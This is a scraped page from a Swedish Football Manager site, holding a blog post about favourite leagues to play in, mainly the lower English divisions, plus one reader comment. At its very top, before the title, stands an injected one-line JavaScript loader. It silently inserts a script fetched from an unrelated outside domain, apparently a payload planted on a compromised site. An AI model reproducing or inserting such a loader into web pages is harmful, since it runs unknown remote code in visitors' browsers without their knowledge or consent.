;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: Vem gillar inte gärsgår’n? – FMSweden
Meny Stäng

Fabbes blogg: Vem gillar inte gärsgår’n?

Veckans blogg handlar om Football Manager, och inte minst om er läsare. Häng med!

Alla som spelar Football Manager har allt som oftast ett favoritland att spela i. Sen jag började spela på riktigt, vilket var CM03/04, har jag nästan uteslutande hållit till i de svenska ligorna. Jag har tagit FC Gute till allsvenskan fler gånger om, jag har fått sparken av Ljungskile och vunnit allsvenskan med Norrby. Under senare år har jag dock ändrat sätt att spela, och istället är jag nästan uteslutande och försöker kämpa på i den engelska gärsgår’n. Det kanske mest klassiska stället att vara på FM, och där jag nästan alltid hittar tillbaka till att ta Barnet uppåt i seriesystemet.

Egentligen är det rätt logiskt att det är just de engelska serierna som fångar mitt intresse. Det har länge varit en stor del av mitt fotbollsintresse, och jag trodde länge att jag var den som hade bäst koll i Sverige på den engelska fotbollen i Championship och neråt. Sen mötte jag en elev i mitt arbete som lärare.  En måndag frågade han om jag hade sett Millwalls Jordan Archers räddning i helgen, eller vad jag tyckte om MK Dons lagkaptens insats i mötet med Rotherham. Samtidigt som jag blev alldeles varm i hjärtat, så insåg jag att jag nog hade en bit kvar i mitt intresse…

Nog med skitsnack, nu vill jag veta var ni helst håller hus på FM. Vilket är erat land och liga ni alltid faller tillbaka till när suget börjar svikta. Serie B? Bulgarien? Premier League? Malaysia? Har ni till och med ett lag som ni alltid vet ger er glädje i spelandet? Kommentera så får vi en skön diskussion.

Sköt om er och tvätt händerna!

/Fabbe

Please wait...

Liknande Inlägg

7 kommentarer

  1. raca14

    Har alltid haft en förkärlek till de lokala lagen i Skåne och väljer allt som oftast de lag som spelar i division 4 eller 5 sedan 2013/2014 då jag själv öppnade upp de serierna på editorn.
    Innan dess höll jag mig till MFF, Sverige och Fijis landslag och några rundor i de lägre divisionerna i England.

Lämna ett svar